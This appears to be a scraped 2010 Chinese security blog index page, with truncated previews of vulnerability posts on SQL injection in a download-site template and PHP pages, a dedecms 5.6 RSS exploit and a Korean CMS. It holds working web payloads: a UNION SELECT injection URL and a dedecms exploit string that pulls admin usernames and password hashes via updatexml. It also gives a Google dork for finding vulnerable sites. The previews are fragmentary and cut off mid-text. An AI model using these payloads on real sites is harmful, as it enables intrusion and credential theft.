功能是当有人通过终端登录且成功后,会向指定的邮箱发送登录者IP地址。
1.先下载blat解压缩到c盘blat目录下面。
2.任意目录新建一个bat文件,我这里是mail.bat,内容如下:
黑面小窝
欢迎光临小窝,有任何问题请留言反馈。QQ:3768110 本站使用全屏模板,导致你访问框架变形的敬请谅解~
2010年8月8日
天空(skycn)程序SQL注入漏洞
天空下载站是国内著名的下载站点,提供国内外最新免费软件、共享软件下载。其在全国各地铁通、联通、电信、信息港等都建有以php+MySql架设的下载分站,相当一部分下载分站的建站程序采用同一套建站模板,而这套建站模板存在SQL注入漏洞。
Tags: php 注入 漏洞
发布:admin | 分类:漏洞收集 | 评论:1 | 引用:0 | 浏览:
2010年8月5日
PHP5.2.6 (content.phpid) SQL注入漏洞
Sql Injection:
http://www.heimian.com/content.php?id=114
xpl :
http://www.heimian.com/content.php?id=-114+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Tags: php 注入 web安全
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年8月5日
dedecms 5.6 RSS订阅页面注入漏洞
EXP:
uploads/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1
利用环境:
...Tags: 注入 php web安全
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年8月2日
老外整理的渗透测试工具
Packet Shaper:
Nemesis: a command line packet shaper
Packit: The Packet Toolkit – A network packet shaper.
Hping by Antirez: a command line TCP/IP packet shaper
Sing: stands for ‘Send ICMP Nasty Garbage’; sends fully customizeable ICMP packets
Tags: tool
发布:admin | 分类:常用工具 | 评论:0 | 引用:0 | 浏览:
2010年8月2日
韩国某cms远程包含、注射、文件泄漏、上传等多个漏洞
来源:0×50sec
无意中发现的,名字未知,版本不详,问题一堆
Google Dork: inurl:bbs_sun/board.php
board.php文件内容如下:
————————–
<?
if(!$admin) $pgUp .= “../”;
